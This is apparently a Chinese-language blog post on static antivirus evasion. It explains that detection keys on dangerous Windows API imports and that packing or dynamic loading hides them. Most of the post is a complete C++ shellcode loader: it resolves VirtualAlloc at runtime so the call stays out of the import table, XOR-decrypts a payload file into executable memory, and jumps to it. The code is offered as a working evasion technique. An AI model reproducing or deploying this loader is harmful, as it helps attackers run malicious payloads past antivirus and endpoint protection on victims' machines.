静态免杀核心观点

主要是看导入表
不同的杀软检测逻辑可能不同，但是通过导入表可以直接获取使用了windows kernel32 的哪些函数，如果是使用多个危险函数，可能就会被报毒
如果想要防止被察觉到，就有两种方法，第一种方法就是使用加壳，第二个方法就是进行动态加载

封装windows api 免杀（r3 层函数重写）

所谓的r3 层本质就是用户层
r0 层就是内核层 -> 驱动

通过封装达到免杀的效果

#include <windows.h>

#include <AXorPlus.h>

  

LPVOID NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)

{

typedef LPVOID(WINAPI * Fn_VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

  

auto hmodule = GetModuleHandleW(L"kernel32.dll");

if (hmodule == NULL)

{

hmodule = LoadLibraryW(L"kernel32.dll");

}

  

auto fn = (Fn_VirtualAlloc)GetProcAddress(hmodule, "VirtualAlloc");

if (fn == NULL)

{

return NULL;

}

return fn(lpAddress, dwSize, flAllocationType, flProtect);

}

  

int main(int argc, char *argv[])

{

AXorPlus xorPlus{};

  

if (argc < 3)

{

std::cout << "Usage: " << argv[0] << " <file> <key>" << std::endl;

return 1;

}

  

auto filePath = argv[1];

auto key = argv[2];

std::string output;

  

std::cout << "Decrypting " << filePath << " with key " << key << std::endl;

xorPlus.XOR2Memory(filePath, output, key, 0);

std::cout << "Decrypted generated successfully" << std::endl;

  

const auto decryptedData = reinterpret_cast<const char *>(output.c_str());

auto size = output.size();

  

PVOID mem = NewVirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  

std::cout << "Allocated memory at " << mem << std::endl;

  

if (mem == NULL)

{

return 1;

}

  

memcpy(mem, decryptedData, size);

  

((void (*)())mem)();

return 0;

}

其中xor 只是异或的方法

#免杀

动态加载

https://tsy244.github.io/2024/11/03/免杀/动态加载/

Author

August Rosenberg

Posted on

November 3, 2024

Licensed under

av_der检测机制 Previous

终端复用和攻防 Next